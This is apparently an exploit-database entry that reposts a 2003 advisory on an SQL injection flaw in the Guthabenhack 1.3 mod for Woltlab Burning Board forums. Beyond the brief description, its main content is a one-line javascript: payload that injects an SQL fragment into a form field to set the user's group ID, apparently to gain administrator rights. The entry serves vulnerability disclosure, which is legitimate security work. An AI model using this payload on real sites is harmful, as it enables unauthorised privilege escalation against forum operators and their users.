MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection



EKU-ID: 28439 CVE: OSVDB-ID:
Author: ben.moeckel@badwebmasters.net Published: 2003-07-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/8321/info

MOD Guthabenhack For Woltlab Burning Board reported prone to an SQL injection vulnerability.

It has been reported that MOD Guthabenhack fails to sufficiently sanitize user input. It has been reported that this may allow the attacker to bypass authentication methods via SQL injection attacks.

javascript:x=document.forms[0].geworbenv;x.value=",
groupid=1";alert(x.value);